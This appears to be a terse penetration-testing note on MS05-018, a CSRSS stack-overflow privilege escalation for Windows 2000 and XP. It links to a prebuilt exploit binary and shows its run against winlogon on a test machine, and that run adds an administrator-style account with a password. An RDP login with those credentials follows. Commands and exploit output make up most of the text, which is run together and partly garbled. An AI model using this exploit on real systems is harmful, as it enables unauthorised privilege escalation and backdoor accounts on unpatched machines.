ms05-018
ms05-018
Works for Windows 2K SP3/4 | Windows XP SP1/2
Download Ms05-018.exe:
https://github.com/xiaoxiaoleo/windows_pentest_tools/tree/master/%E6%8F%90%E6%9D%83%E5%B7%A5%E5%85%B7/windows% E6%8f%90%e6%9d%83%e5%b7%a5%e5%85%b7/ms05018%e2%80%94csrss. Exe%e6%bc%8f%e6%b4%9e%e5%88%a9%e7%94%a8/ms05018%e2%80%94csrss. Exe%e6%bc%8f%e6%b4%9e%e5%88%a9%e7%94%a8/tool
C:\windows\system32>systeminfosysteminfohost Name:vulnboxos Name:microsoft WINDOWS XP Professionalos version:5.1.2600 Service Pack 1 Build 2600Processor (s): 1 Processor (s) Inst Alled. [x86]: Family 6 Model Stepping 2 genuineintel ~3457 mhzbios version:intel-6040000windows Directory: C:\WINDOWSSystem directory:c:\windows\system32boot Device: \device\harddiskvolume1system locale:en-us; 中文版 (states) Input locale:en-us; 中文版 (states) Time Zone: (GMT) Greenwich Mean Time:dublin, Edinburgh, Lisbon, Londonhotfix (s): 3 Hotfix (s) installed. [To]: File 1 [Q147222]: Kb893803v2-updatec:\inetpub\wwwroot >ms05-018.exems5.exems05-018 Windows CSRSS. EXE Stack Overflow Exp v1.0affect:windows SP3/SP4 (all language) Coded by Eyas <eyas in xfocus.org>--->http://www.xfocus.netcompile by ICESKYSL [IST] --->www.iceskysl.netusage:ms5.exe pid[+] pid=440 Process=winlogon.exec:\inetpub\wwwroot>ms05-018.exe 440ms5.exe 440ms05-018 Windows CSRSS. EXE Stack Overflow exp v1.0affect:windows SP3/SP4 (all language) Coded by Eyas <eyas at xfocus.org>--->http ://www.xfocus.netcompile by ICESKYSL [IST]--->www.iceskysl.net[+] freeconsole OK. [+] AllocConsole OK. [+] Get Console Title OK: "Ms5.exe" [+] Bingo! Found hwnd=70038[+] Start search "FF E4" in ntdll.dll[+] found "FF E4" (jmp ESP) in 77fb59cc[ntdll.dll][+] Createfilemappin G ok! [+] MapViewOfFile ok! [+] Send exploit! [+] Done.it ' s'll successful add user:username=epassword=asd#321[email protected]:~# rdesktop-u e-p asd#321 x.x.x.x
Windows XP SP1 Privilege escalation